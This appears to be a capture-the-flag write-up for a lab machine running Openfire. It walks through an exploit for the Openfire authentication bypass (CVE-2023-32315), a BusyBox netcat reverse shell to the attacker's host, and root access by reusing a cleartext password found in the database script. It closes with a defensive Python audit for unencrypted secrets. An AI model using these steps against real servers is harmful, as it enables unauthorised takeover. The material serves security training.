# Fired

`openfire`

* Machine name: Fired
* Difficulty: Intermediate
* OS: Linux

## Enumeration

### NMAP

```
Nmap scan report for 192.168.205.96
Host is up (0.037s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
9090/tcp open  zeus-admin
9091/tcp open  xmltec-xmlmail
```

### HTTP (9090)

OpenFire

<https://github.com/miko550/CVE-2023-32315>

```
┌──(kali㉿kali)-[~/htb]
└─$ git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (31/31), 38.13 KiB | 1.59 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(kali㉿kali)-[~/htb]
└─$ cd CVE-2023-32315
┌──(kali㉿kali)-[~/htb/CVE-2023-32315]
└─$ pip3 install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/pywhisker-0.1.0-py3.11.egg is deprecated. pip 25.1 will enforce this behaviour change. A possible replacement is to use pip for package installation. Discussion can be found at https://github.com/pypa/pip/issues/12330
Collecting HackRequests (from -r requirements.txt (line 1))
  Downloading HackRequests-1.2-py3-none-any.whl.metadata (677 bytes)
Downloading HackRequests-1.2-py3-none-any.whl (7.3 kB)
Installing collected packages: HackRequests
Successfully installed HackRequests-1.2
┌──(kali㉿kali)-[~/htb/CVE-2023-32315]
└─$ python3 CVE-2023-32315.py -t http://192.168.205.96:9090 


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://192.168.205.96:9090
Successfully retrieved JSESSIONID: node0jp50013d8iug1i67k8j0d0npu4.node0 + csrf: AxHdf1soa4KErbH
User added successfully: url: http://192.168.205.96:9090 username: 9ah9rw password: ky2k1r
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FRSvv4RRucAdCyNWudDz6%2Fcaa8ca33fab8259326963715b7ffdd05.png?alt=media&#x26;token=7224c6d9-efe9-4530-a576-815e845f2368" alt=""><figcaption></figcaption></figure>

We are indeed logged in as an administrator. Next, we try to obtain a reverse shell.

## Initial access

We log in, then go to Plugins to upload the .jar file we downloaded earlier from the git repository. Still following the same instructions, we go to the settings, then Management Tool, and enter the password 123. Commands can then be run under "system command".

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FK23B1ernZQVazzKrGTxw%2F3f034f20ffebdfd77a6a1a3655383fdb.png?alt=media&#x26;token=d57fe97a-0e9e-48f4-8aff-6f6bb1793fd5" alt=""><figcaption></figcaption></figure>

BusyBox works:

```
busybox nc 192.168.45.189 9091 -e /bin/bash
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9091
listening on [any] 9091 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.205.96] 35294
```

We are the openfire user.

## Privilege escalation

Running LinPEAS, nothing jumps out. We enumerate the configuration files to look for a cleartext password.

```
openfire@openfire:/usr/share/openfire$ cd embedded-db
openfire@openfire:/usr/share/openfire/embedded-db$ cat openfire.script
{...}
INSERT INTO OFPROPERTY VALUES('mail.configured','true',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.debug','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.host','localhost',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.password','OpenFireAtEveryone',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.port','25',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.ssl','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.username','root',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','EOAJUe2Sqdlfqjk',0,NULL)

openfire@openfire:/usr/share/openfire/embedded-db$ su root
su root
Password: OpenFireAtEveryone

root@openfire:/usr/share/openfire/embedded-db# whoami
whoami
root
```
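
Defender-side follow-up to the finding above, as an added example that is not part of the original write-up: a Python audit that flags secret-looking `OFPROPERTY` rows stored unencrypted in `openfire.script`. It assumes the third column is Openfire's `encrypted` flag and the fourth its IV; the name heuristic, the function name `audit_ofproperty` and the sample rows are constructed for illustration.

```python
import re

# One HSQLDB row: INSERT INTO OFPROPERTY VALUES('name','value',encrypted,iv)
# Assumption: column 3 is the "encrypted" flag, column 4 the IV.
ROW = re.compile(
    r"^INSERT INTO OFPROPERTY VALUES\("
    r"'((?:[^']|'')*)','((?:[^']|'')*)',(\d+|NULL),(NULL|'(?:[^']|'')*')\)\s*$",
    re.IGNORECASE,
)
# Property names that usually hold a credential (heuristic chosen for this example).
SECRET_NAME = re.compile(r"(password|passwd|secret|token|key)", re.IGNORECASE)


def audit_ofproperty(script_text):
    """Return findings for secret-looking properties stored with encrypted != 1."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        m = ROW.match(line.strip())
        if not m:
            continue  # not an OFPROPERTY row (other tables, DDL, "{...}")
        name, value, encrypted, _iv = m.groups()
        value = value.replace("''", "'")  # undo SQL quote doubling
        if SECRET_NAME.search(name) and encrypted != "1" and value:
            findings.append({
                "line": lineno,
                "property": name,
                "length": len(value),  # report length only, never echo the secret
            })
    return findings


# Constructed sample in the same format as the dump above (placeholder values).
SAMPLE = """\
INSERT INTO OFPROPERTY VALUES('mail.configured','true',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.host','localhost',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.password','example-smtp-pass',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.username','root',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','example-key-value',0,NULL)
INSERT INTO OFPROPERTY VALUES('ldap.adminPassword','3f9ac0de',1,'c2FtcGxlLWl2')
"""

if __name__ == "__main__":
    for f in audit_ofproperty(SAMPLE):
        print(f"line {f['line']}: {f['property']} stored unencrypted "
              f"({f['length']} chars)")
```

Any property it reports should be rotated and checked for reuse as a local account password, which is the reuse that gave root on this machine.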
